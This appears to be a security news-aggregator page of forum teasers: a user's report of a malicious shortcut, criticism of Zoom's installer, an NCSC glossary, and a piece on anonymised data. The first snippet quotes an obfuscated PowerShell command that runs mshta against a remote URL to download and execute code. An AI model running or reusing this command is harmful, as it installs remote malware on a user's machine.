Accidentally clicked a Shortcut in a Download..

Accidentally clicked a Shortcut in a Download.. Looks like it was malware doing powershell. Here is what i was able to see in properties though im sure much of the code was parsed: opening from %SYSTEMROOT%System32WindowsPowerShellv1.0 $lo=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ‘ ‘,”;$wg=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ‘ ‘,”;Set-Alias wuy $wg;$lo+=’://tinyshort.xyz/hito’;wuy $lo I see it was replacing data, but can’t really tell what else. I saw a command prompt open and saw that it was able to disable my firewall… but i saw system deny it access a bunch of times too… i feel so stupid…

Read More

Zoom Appears To Use Actual Malware Techniques Upon Installation

Zoom Appears To Use Actual Malware Techniques Upon Installation https://twitter.com/c1truz_/status/1244737672930824193 Zoom’s package installer installs things prior to the user clicking confirm, that is, during install check. It also appears to spoof a credential check to elevate priviliges to do so. It also doesn’t write anything to /var/db/receipts so you don’t know what it installed or where. And more about nefarious package installation: https://macpkghallofshame.tumblr.com/post/138612887932/indistinguishable-from-malware Zoom has previous form: Zoom installed a persisent web server on your machine which stayed even after you uninstalled. Apple were so concerned they silently removed it…

Read More

🚨Cyber#Security Cheat Sheet Alert 🚨 This glossary covers of all the technical jargon that industry insiders love (and hate) to use. Credits: NCSC

🚨CyberSecurity Cheat Sheet Alert 🚨 This glossary covers of all the technical jargon that industry insiders love (and hate) to use. Credits: NCSC submitted by /u/ATTACKERSA to r/cybersecurity [link] [comments] top scoring links : multi

Read More

Aral Balkan: “Anonymised data” is a multi-billion dollar industry for a reason. And the reason is because there’s nothing anonymous about it.

Aral Balkan: “Anonymised data” is a multi-billion dollar industry for a reason. And the reason is because there’s nothing anonymous about it. Are there exceptions? Some companies have great privacy policies, but use 3rd party processors without great privacy policies. These relationships are sometimes justified by reportedly only sharing “fuzzed” or “anonymized” data. For example, see this diagram fine print for the Startpage search engine. It’s important to be fair to companies, while also being honest with privacy-focused users. Are there exceptions to “there’s nothing anonymous about it?” Should we…

Read More